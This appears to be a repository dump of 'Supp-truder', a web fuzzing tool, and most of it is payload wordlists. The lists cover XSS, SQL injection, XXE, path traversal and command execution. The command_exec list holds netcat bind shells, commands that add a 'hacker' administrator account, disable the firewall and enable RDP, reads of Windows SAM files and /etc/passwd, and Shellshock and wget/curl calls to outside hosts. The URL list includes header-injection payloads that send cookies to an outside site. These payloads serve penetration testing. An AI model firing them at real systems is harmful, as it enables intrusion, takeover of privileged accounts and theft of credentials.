├── database ├── test.txt ├── grep_injectx.txt ├── bad_chars.txt ├── dirbuster-dirs.txt ├── fuzz_chall.txt ├── usernames.txt ├── sqli_escape_chars.txt ├── xss_grep.txt ├── xss_escape_chars.txt ├── passwords_quick.txt ├── ssi_quick.txt ├── xss_funny_stored.txt ├── xss_swf_fuzz.txt ├── payload_injectx.txt ├── xss_remote_payloads-http.txt ├── xss_payloads_quick.txt ├── sqli-time-based.txt ├── html_tags.txt ├── xss_remote_payloads-https.txt ├── auth_bypass.txt ├── sqli-error-based.txt ├── html_events.txt ├── traversal-short.txt ├── xss_find_inject.txt ├── passwords_medium.txt ├── xml-attacks.txt ├── 3d.txt ├── dirbuster-top1000.txt ├── command_exec.txt ├── url_payloads.txt └── headers ├── supptruder.py ├── tampers ├── htmlEncode.py ├── urlEncode.py ├── doubleUrlEncode.py ├── base64.py ├── base64_php_object.py ├── Readme.md └── jwtEncode.py ├── docker ├── docker-compose.yml └── Dockerfile ├── requirements.txt ├── LICENSE ├── .gitignore ├── sources ├── printing.py ├── differs.py ├── http.py ├── intruder.py └── sup.py └── README.md /database/test.txt: -------------------------------------------------------------------------------- 1 | test.js 2 | test.html 3 | index.php -------------------------------------------------------------------------------- /database/grep_injectx.txt: -------------------------------------------------------------------------------- 1 | INJECTX 2 | 3 | (INJECTX) 4 | -------------------------------------------------------------------------------- /database/bad_chars.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ElSicarius/Supp-truder/HEAD/database/bad_chars.txt -------------------------------------------------------------------------------- /database/dirbuster-dirs.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ElSicarius/Supp-truder/HEAD/database/dirbuster-dirs.txt -------------------------------------------------------------------------------- /database/fuzz_chall.txt: -------------------------------------------------------------------------------- 1 | /www/index.html 2 | /etc/passwd 3 | /etc/hosts 4 | /var/log/nginx/access.log 5 | /var/log/nginx/error.log -------------------------------------------------------------------------------- /supptruder.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | 3 | from sources.sup import main 4 | 5 | if __name__ == '__main__': 6 | main() 7 | -------------------------------------------------------------------------------- /database/usernames.txt: -------------------------------------------------------------------------------- 1 | root 2 | admin 3 | test 4 | guest 5 | info 6 | adm 7 | mysql 8 | user 9 | administrator 10 | oracle 11 | ftp 12 | -------------------------------------------------------------------------------- /database/sqli_escape_chars.txt: -------------------------------------------------------------------------------- 1 | ' 2 | " 3 | '' 4 | '" 5 | ; 6 | 7 | ) 8 | ') 9 | ") 10 | "); 11 | '; 12 | "; 13 | %' 14 | %" 15 | %') 16 | %") 17 | ')) 18 | ")) 19 | "))) 20 | 21 | 22 | -------------------------------------------------------------------------------- /tampers/htmlEncode.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | 3 | from html import escape, unescape 4 | 5 | def process(payload): 6 | return escape(payload) 7 | 8 | def unprocess(payload): 9 | return unescape(payload) -------------------------------------------------------------------------------- /tampers/urlEncode.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | 3 | from urllib.parse import quote, unquote 4 | 5 | def process(payload): 6 | return quote(payload) 7 | 8 | def unprocess(payload): 9 | return unquote(payload) -------------------------------------------------------------------------------- /database/xss_grep.txt: -------------------------------------------------------------------------------- 1 | XSS 2 | INJECTX 3 | 1111111 4 | XXXXXXX 5 | alert( 6 | prompt( 7 | onload= 8 | onerror= 9 | onmouseover= 10 | location.href= 11 | document.cookie( 12 | crowdshield 13 | //INJECTX 4 |

//INJECTX 5 | //INJECTX 6 |

//INJECTX 7 |

//INJECTX 8 | //INJECTX 9 | //INJECTX 10 | cript:alert('XSS')"> 56 | 57 | XSS 58 | ]>Contents of file: &xxe; 59 | ]>&xxe;]>&xxe; 60 | ]>&xxe; ]>&xxe; 61 | }} 185 | 186 | 187 | \n 188 | \n\033[2curl http://135.23.158.130/.testing/term_escape.txt?vuln=1?user=\`whoami\` 189 | \n\033[2wget http://135.23.158.130/.testing/term_escape.txt?vuln=2?user=\`whoami\` 190 | \n/bin/ls -al\n 191 | | nc -lvvp 4444 -e /bin/sh| 192 | ; nc -lvvp 4444 -e /bin/sh; 193 | & nc -lvvp 4444 -e /bin/sh& 194 | && nc -lvvp 4444 -e /bin/sh & 195 | nc -lvvp 4444 -e /bin/sh 196 | nc -lvvp 4445 -e /bin/sh & 197 | nc -lvvp 4446 -e /bin/sh| 198 | nc -lvvp 4447 -e /bin/sh; 199 | nc -lvvp 4448 -e /bin/sh& 200 | \necho INJECTX\nexit\n\033[2Acurl https://crowdshield.com/.testing/rce_vuln.txt\n 201 | \necho INJECTX\nexit\n\033[2Asleep 5\n 202 | \necho INJECTX\nexit\n\033[2Awget https://crowdshield.com/.testing/rce_vuln.txt\n 203 | | net localgroup Administrators hacker /ADD 204 | ; net localgroup Administrators hacker /ADD 205 | & net localgroup Administrators hacker /ADD 206 | && net localgroup Administrators hacker /ADD 207 | net localgroup Administrators hacker /ADD 208 | | netsh firewall set opmode disable 209 | ; netsh firewall set opmode disable 210 | & netsh firewall set opmode disable 211 | && netsh firewall set opmode disable 212 | netsh firewall set opmode disable 213 | netstat 214 | ;netstat -a; 215 | | netstat -an 216 | ; netstat -an 217 | & netstat -an 218 | && netstat -an 219 | netstat -an 220 | | net user hacker Password1 /ADD 221 | ; net user hacker Password1 /ADD 222 | & net user hacker Password1 /ADD 223 | && net user hacker Password1 /ADD 224 | net user hacker Password1 /ADD 225 | | net view 226 | ; net view 227 | & net view 228 | && net view 229 | net view 230 | \nid| 231 | \nid; 232 | \nid\n 233 | \n/usr/bin/id\n 234 | perl -e 'print "X"x1024' 235 | || perl -e 'print "X"x16096' 236 | | perl -e 'print "X"x16096' 237 | ; perl -e 'print "X"x16096' 238 | & perl -e 'print "X"x16096' 239 | && perl -e 'print "X"x16096' 240 | perl -e 'print "X"x16384' 241 | ; perl -e 'print "X"x2048' 242 | & perl -e 'print "X"x2048' 243 | && perl -e 'print "X"x2048' 244 | perl -e 'print "X"x2048' 245 | || perl -e 'print "X"x4096' 246 | | perl -e 'print "X"x4096' 247 | ; perl -e 'print "X"x4096' 248 | & perl -e 'print "X"x4096' 249 | && perl -e 'print "X"x4096' 250 | perl -e 'print "X"x4096' 251 | || perl -e 'print "X"x8096' 252 | | perl -e 'print "X"x8096' 253 | ; perl -e 'print "X"x8096' 254 | && perl -e 'print "X"x8096' 255 | perl -e 'print "X"x8192' 256 | perl -e 'print "X"x81920' 257 | || phpinfo() 258 | | phpinfo() 259 | {${phpinfo()}} 260 | ;phpinfo() 261 | ;phpinfo();// 262 | ';phpinfo();// 263 | {${phpinfo()}} 264 | & phpinfo() 265 | && phpinfo() 266 | phpinfo() 267 | phpinfo(); 268 | 269 | 270 | 271 | 272 | 273 | 274 | 275 | 276 | :phpversion(); 277 | `ping 127.0.0.1` 278 | & ping -i 30 127.0.0.1 & 279 | & ping -n 30 127.0.0.1 & 280 | ;${@print(md5(RCEVulnerable))}; 281 | ${@print("RCEVulnerable")} 282 | ${@print(system($_SERVER['HTTP_USER_AGENT']))} 283 | pwd 284 | | pwd 285 | ; pwd 286 | & pwd 287 | && pwd 288 | \r 289 | | reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f 290 | ; reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f 291 | & reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f 292 | && reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f 293 | reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f 294 | \r\n 295 | route 296 | | sleep 1 297 | ; sleep 1 298 | & sleep 1 299 | && sleep 1 300 | sleep 1 301 | || sleep 10 302 | | sleep 10 303 | ; sleep 10 304 | {${sleep(10)}} 305 | & sleep 10 306 | && sleep 10 307 | sleep 10 308 | || sleep 15 309 | | sleep 15 310 | ; sleep 15 311 | & sleep 15 312 | && sleep 15 313 | {${sleep(20)}} 314 | {${sleep(20)}} 315 | {${sleep(3)}} 316 | {${sleep(3)}} 317 | | sleep 5 318 | ; sleep 5 319 | & sleep 5 320 | && sleep 5 321 | sleep 5 322 | {${sleep(hexdec(dechex(20)))}} 323 | {${sleep(hexdec(dechex(20)))}} 324 | sysinfo 325 | | sysinfo 326 | ; sysinfo 327 | & sysinfo 328 | && sysinfo 329 | ;system('cat%20/etc/passwd') 330 | system('cat C:\boot.ini'); 331 | system('cat config.php'); 332 | system('cat /etc/passwd'); 333 | || system('curl https://crowdshield.com/.testing/rce_vuln.txt'); 334 | | system('curl https://crowdshield.com/.testing/rce_vuln.txt'); 335 | ; system('curl https://crowdshield.com/.testing/rce_vuln.txt'); 336 | & system('curl https://crowdshield.com/.testing/rce_vuln.txt'); 337 | && system('curl https://crowdshield.com/.testing/rce_vuln.txt'); 338 | system('curl https://crowdshield.com/.testing/rce_vuln.txt') 339 | system('curl https://crowdshield.com/.testing/rce_vuln.txt?req=22fd2wdf') 340 | system('curl https://xerosecurity.com/.testing/rce_vuln.txt'); 341 | system('echo XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX') 342 | systeminfo 343 | | systeminfo 344 | ; systeminfo 345 | & systeminfo 346 | && systeminfo 347 | system('ls') 348 | system('pwd') 349 | system('pwd'); 350 | || system('sleep 5'); 351 | | system('sleep 5'); 352 | ; system('sleep 5'); 353 | & system('sleep 5'); 354 | && system('sleep 5'); 355 | system('sleep 5') 356 | system('sleep 5'); 357 | system('wget https://crowdshield.com/.testing/rce_vuln.txt?req=22fd2w23') 358 | system('wget https://xerosecurity.com/.testing/rce_vuln.txt'); 359 | system('whoami') 360 | system('whoami'); 361 | test*; ls -lhtR /var/www/ 362 | test* || perl -e 'print "X"x16096' 363 | test* | perl -e 'print "X"x16096' 364 | test* & perl -e 'print "X"x16096' 365 | test* && perl -e 'print "X"x16096' 366 | test*; perl -e 'print "X"x16096' 367 | $(`type C:\boot.ini`) 368 | &&type C:\\boot.ini 369 | | type C:\Windows\repair\SAM 370 | ; type C:\Windows\repair\SAM 371 | & type C:\Windows\repair\SAM 372 | && type C:\Windows\repair\SAM 373 | type C:\Windows\repair\SAM 374 | | type C:\Windows\repair\SYSTEM 375 | ; type C:\Windows\repair\SYSTEM 376 | & type C:\Windows\repair\SYSTEM 377 | && type C:\Windows\repair\SYSTEM 378 | type C:\Windows\repair\SYSTEM 379 | | type C:\WINNT\repair\SAM 380 | ; type C:\WINNT\repair\SAM 381 | & type C:\WINNT\repair\SAM 382 | && type C:\WINNT\repair\SAM 383 | type C:\WINNT\repair\SAM 384 | type C:\WINNT\repair\SYSTEM 385 | | type %SYSTEMROOT%\repair\SAM 386 | ; type %SYSTEMROOT%\repair\SAM 387 | & type %SYSTEMROOT%\repair\SAM 388 | && type %SYSTEMROOT%\repair\SAM 389 | type %SYSTEMROOT%\repair\SAM 390 | | type %SYSTEMROOT%\repair\SYSTEM 391 | ; type %SYSTEMROOT%\repair\SYSTEM 392 | & type %SYSTEMROOT%\repair\SYSTEM 393 | && type %SYSTEMROOT%\repair\SYSTEM 394 | type %SYSTEMROOT%\repair\SYSTEM 395 | uname 396 | ;uname; 397 | | uname -a 398 | ; uname -a 399 | & uname -a 400 | && uname -a 401 | uname -a 402 | |/usr/bin/id 403 | ;|/usr/bin/id| 404 | ;/usr/bin/id| 405 | $;/usr/bin/id 406 | () { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://135.23.158.130/.testing/shellshock.txt?vuln=13;curl http://135.23.158.130/.testing/shellshock.txt?vuln=15;\");' 407 | () { :;}; wget http://135.23.158.130/.testing/shellshock.txt?vuln=11 408 | | wget http://crowdshield.com/.testing/rce.txt 409 | & wget http://crowdshield.com/.testing/rce.txt 410 | ; wget https://crowdshield.com/.testing/rce_vuln.txt 411 | $(`wget https://crowdshield.com/.testing/rce_vuln.txt`) 412 | && wget https://crowdshield.com/.testing/rce_vuln.txt 413 | wget https://crowdshield.com/.testing/rce_vuln.txt 414 | $(`wget https://crowdshield.com/.testing/rce_vuln.txt?req=22jjffjbn`) 415 | which curl 416 | which gcc 417 | which nc 418 | which netcat 419 | which perl 420 | which python 421 | which wget 422 | whoami 423 | | whoami 424 | ; whoami 425 | ' whoami 426 | ' || whoami 427 | ' & whoami 428 | ' && whoami 429 | '; whoami 430 | " whoami 431 | " || whoami 432 | " | whoami 433 | " & whoami 434 | " && whoami 435 | "; whoami 436 | $(`whoami`) 437 | & whoami 438 | && whoami 439 | {{ get_user_file("C:\boot.ini") }} 440 | {{ get_user_file("/etc/hosts") }} 441 | {{ get_user_file("/etc/passwd") }} 442 | {{4+4}} 443 | {{4+8}} 444 | {{person.secret}} 445 | {{person.name}} 446 | {1} + {1} 447 | {% For c in [1,2,3]%} {{c, c, c}} {% endfor%} 448 | {{[] .__ Class __.__ base __.__ subclasses __ ()}} 449 | -------------------------------------------------------------------------------- /database/url_payloads.txt: -------------------------------------------------------------------------------- 1 | http://xerosecurity.com 2 | .xerosecurity.com 3 | .crowdshield.com 4 | //xerosecurity.com 5 | \\xerosecurity.com 6 | \/xerosecurity.com 7 | \/\/xerosecurity.com 8 | /\xerosecurity.com 9 | /\/\xerosecurity.com 10 | |/xerosecurity.com 11 | /%09/xerosecurity.com 12 | /xerosecurity.com 13 | javascript:document.location=http://xerosecurity.com 14 | %2Fwww%252egoogle%252ecom 15 | %2Fwww%252egoogle%252ecom%252f 16 | %2Fwww%2egoogle%2ecom 17 | %ff%2Fwww%252egoogle%252ecom 18 | %ff%2Fwww%252egoogle%252ecom%252f 19 | //www.xerosecurity.com/%2E%2E 20 | /www.xerosecurity.com/%2E%2E 21 | /%2fwww.xerosecurity.com/%2e%2e/ 22 | //////www.xerosecurity.com/%2e%2e/ 23 | //www.xerosecurity.com/ 24 | \/www.xerosecurity.com/ 25 | \/www.xerosecurity.com/ 26 | \/www.xerosecurity.com/%2e%2e/ 27 | /\www.xerosecurity.com/%2e%2e/ 28 | /%2fwww.xerosecurity.com/%2e%2e 29 | /%2fwww.xerosecurity.com/%2e%2e/ 30 | https://www.xerosecurity.com/ 31 | %0a.xerosecurity.com/ 32 | www.xerosecurity.com/ 33 | %0d.xerosecurity.com%2f 34 | %0d%2exerosecurity.com%2f 35 | %0a%2exerosecurity.com%2f 36 | %2e%5fxerosecurity.com%2e%5f 37 | %2fwww.xerosecurity.com/%2e%2e 38 | %2fwww.xerosecurity.com%2f%2e%2e 39 | %2Fwww%252egoogle%252ecom 40 | %2Fwww%252egoogle%252ecom%252f 41 | %2Fwww%2egoogle%2ecom 42 | %ff%2Fwww%252egoogle%252ecom 43 | %ff%2Fwww%252egoogle%252ecom%252f 44 | //www.xerosecurity.com/%2E%2E 45 | /www.xerosecurity.com/%2E%2E 46 | /%2fwww.xerosecurity.com/%2e%2e/ 47 | //////www.xerosecurity.com/%2e%2e/ 48 | //www.xerosecurity.com/ 49 | \/www.xerosecurity.com/ 50 | \/www.xerosecurity.com/ 51 | \/www.xerosecurity.com/%2e%2e/ 52 | /\www.xerosecurity.com/%2e%2e/ 53 | /%2fwww.xerosecurity.com/%2e%2e 54 | /%2fwww.xerosecurity.com/%2e%2e/ 55 | https://www.xerosecurity.com/ 56 | %0a.xerosecurity.com/ 57 | www.xerosecurity.com/ 58 | %0d.xerosecurity.com%2f 59 | %0d%2exerosecurity.com%2f 60 | %0a%2exerosecurity.com%2f 61 | %2e%5fxerosecurity.com%2e%5f 62 | %2fwww.xerosecurity.com/%2e%2e 63 | %2fwww.xerosecurity.com%2f%2e%2e 64 | '+alert(INJECTX)+'/%2E%2E 65 | ">

/%2E%2E/%2E%2E/ 66 | %2Fx%2F%3cimg%2Fonerror='alert(INJECTX)'src=x%3e%2f.%2e%2f.%2e%2f%3f 67 | /x/

/../../ 68 | INJECTX'"<>/%2e%2e 69 | INJECTX'"<>/%2e%2e/ 70 | INJECTX'"<> 71 | INJECTX%27%22%3c%3e%2e%2e 72 | INJECTX%27%22%3c%3e%2e%2e/ 73 | INJECTX/%2e%2e 74 | INJECTX/%2e%2e/ 75 | %2e%2e/INJECTX/ 76 | %2e%2e/INJECTX 77 | http://xerosecurity.com/.testing/redirect_vuln.txt 78 | http://xerosecurity.com/.testing/redirect_vuln.txt%00 79 | http://xerosecurity.com/.testing/rfi_vuln.txt 80 | http://xerosecurity.com/.testing/rfi_vuln.txt%00 81 | http://xerosecurity.com/.testing/rfi_vuln.php 82 | http://xerosecurity.com/.testing/rfi_vuln.php%00 83 | http://xerosecurity.com/.testing/xss_vuln.php 84 | http://xerosecurity.com/.testing/xss_vuln.php%00 85 | http://xerosecurity.com/.testing/xss_vuln.html 86 | http://xerosecurity.com/.testing/xss_vuln.html%00 87 | http://xerosecurity.com/.testing/xss.html 88 | http://xerosecurity.com/.testing/xss.html%00 89 | http://xerosecurity.com/.testing/iframe_injection.php 90 | //xerosecurity.com 91 | \/xerosecurity.com 92 | |/xerosecurity.com 93 | /%09/xerosecurity.com 94 | /xerosecurity.com 95 | crowdshield.com 96 | xerosecurity.com 97 | javascript:alert(1)//INJECTX 98 | javascript:document.location=http://xerosecurity.com 99 | php://input 100 | data://text/plain;base64,SmJhdHk4Y1dIbFJhemh6Q3lqQTw%2FcGhwIGVjaG8gJ1Z1bG5lcmFibGUnOyA%2FPkpiYXR5OGNXSGxSYXpoekN5akE= 101 | php://input;base64,SmJhdHk4Y1dIbFJhemh6Q3lqQTw%2FcGhwIGVjaG8gJ1Z1bG5lcmFibGUnOyA%2FPkpiYXR5OGNXSGxSYXpoekN5akE= 102 | https://crowdshield.com/.testing/rfi_vuln.php 103 | https://crowdshield.com/.testing/rfi_vuln.php%00 104 | //xerosecurity.com/.testing/rfi_vuln.php 105 | //xerosecurity.com/.testing/rfi_vuln.php%00 106 | http://xerosecurity.com/.testing/rfi_vuln.php 107 | http://xerosecurity.com/.testing/rfi_vuln.php%00 108 | %0a 109 | %0a 110 | %0a%20 111 | %0a%20 112 | %0aSet-Cookie%3AINJECT%3DINJECTXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%3B%0aLocation%3Ahttp%3A%2F%2Fxerosecurity.com%2F.testing%2Fiframe_injection.php%0a%0a 113 | %0d%0aSet-Cookie%3AINJECT%3DINJECTXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%3B%0d%0aLocation%3Ahttp%3A%2F%2Fxerosecurity.com%2F.testing%2Fiframe_injection.php%0d%0a%0d%0a 114 | %0d%0aSet-Cookie: INJECTX=INJECTXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX; 115 | %0aSet-Cookie: INJECTX=INJECTXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX; 116 | %0aContent-Length%3A%200%0a%0aHTTP%2F1.1%20200%20OK%0aContent-Type%3A%20text%2Fhtml%0aLast-Modified%3A%20Fri%2C%2030%20Apr%202099%2011%3A11%3A18%20GMT%0aContent-Length%3A%2048%0a%3Chtml%3E%3Cscript%3Edocument.cookie()%3B%3C%2Fscript%3E%3C%2Fhtml%3E 117 | %0aContent-Length%3A%200%0a%0aHTTP%2F1.1%20200%20OK%0aContent-Type%3A%20text%2Fhtml%0aLocation%3A%20http%3A%2F%2Fcrowdshield.com%0aContent-Length%3A%20122%0a%3Chtml%3E%3CBODY%20ONLOAD%3Dalert('XSS')%3E%3Cscript%3Ealert(1)%3B%3C%2Fscript%3E%3CIFRAME%20SRC%3D%22javascript%3Aalert('XSS')%3B%22%3E%3C%2FIFRAME%3E%3C%2Fbody%3E%3C%2Fhtml%3E 118 | %0aContent-Length%3A%200%0a%0aHTTP%2F1.1%20200%20OK%0aDate%3A%20Fri%2C%2006%20Mar%202016%2000%3A07%3A47%20GMT%0aContent-Type%3A%20text%2Fhtml%3Bcharset%3DISO-8859-1%0aContent-Length%3A%2040%0a%3Chtml%3E%3Cbody%3E%3Cscript%3Ealert(1)%3B%3C%2Fscript%3E 119 | %0aContent-Length%3A%200%0a%0aHTTP%2F1.1%20200%20OK%0aDate%3A%20Fri%2C%2006%20Mar%202016%2000%3A07%3A47%20GMT%0aContent-Type%3A%20text%2Fhtml%3Bcharset%3DUTF-8%0aContent-Length%3A%2052%0a%3Chtml%3E%3Cbody%3E%3Cscript%3Ealert(1)%3B%3C%2Fscript%3E%3C%2Fbody%3E%3C%2Fhtml%3E 120 | %0aContent-Length%3A%200%0a%0aHTTP%2F1.1%20200%20OK%0aDate%3A%20Fri%2C%2006%20Mar%202016%2000%3A07%3A47%20GMT%0aContent-Type%3A%20text%2Fhtml%3Bcharset%3DUTF-8%0aContent-Length%3A%20769%0a%3Chtml%3E%3Cbody%3E%3Cscript%20src%3D%22http%3A%2F%2Fxerosecurity.com%2F.testing%2Fxss.js%3Fscript_src%3D1%22%3E%3C%2Fscript%3E%0a%3Cimg%20src%3D%22http%3A%2F%2Fxerosecurity.com%2F.testing%2Fxss.jpg%3Fimg_src%3D1%22%3E%3C%2Fimg%3E%0a%3Ciframe%20src%3D%22http%3A%2F%2Fxerosecurity.com%2F.testing%2Fiframe_injection.php%3Fiframe_src%3D1%22%20height%3D%220%22%20width%3D%220%22%3E%3C%2Fiframe%3E%0a%3Ciframe%20src%3D%22http%3A%2F%2Fxerosecurity.com%2F.testing%2Fiframe_injection.php%3Fiframe_src%3D1%22%20height%3D%22100%25%22%20width%3D%22100%25%22%3E%3C%2Fiframe%3E%0a%3Cimg%20src%3D%22http%3A%2F%2Fxerosecurity.com%2F.testing%2Fxss.jpg%3Fimg_src_onerror_prompt%22%20onerror%3Dprompt(%22http%3A%2F%2Fxerosecurity.com%2F.testing%2Fxss.js%22)%3B%3E%0a%3Cimg%20src%3D%22http%3A%2F%2Fxerosecurity.com%2F.testing%2Fxss.jpg%3Fimg_src_onerror_prompt%22%20onerror%3Dwindow.location(%22http%3A%2F%2Fxerosecurity.com%2F.testing%2Fxss.html%22)%3B%3E%0a%3Cscript%3Elocation.href%3D'http%3A%2F%2Fxerosecurity.com%2F.testing%2Fiframe_injection.php%3F'%2Bdocument.cookie%3B%3C%2Fscript%3E%3C%2Fbody%3E%3C%2Fhtml%3E 121 | %0aContent-Length%3A%200%0a%0aHTTP%2F1.1%20200%20OK%0aDate%3A%20Fri%2C%2006%20Mar%202016%2000%3A07%3A47%20GMT%0aLast-Modified%3A%20Fri%2C%2006%20Mar%202017%2000%3A07%3A47%20GMT%0aContent-Type%3A%20text%2Fhtml%3Bcharset%3DISO-8859-1%0aContent-Length%3A%2040%0a%3Chtml%3E%3Cbody%3E%3Cscript%3Ealert(1)%3B%3C%2Fscript%3E 122 | //crowdshield.com%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%20222%0d%0a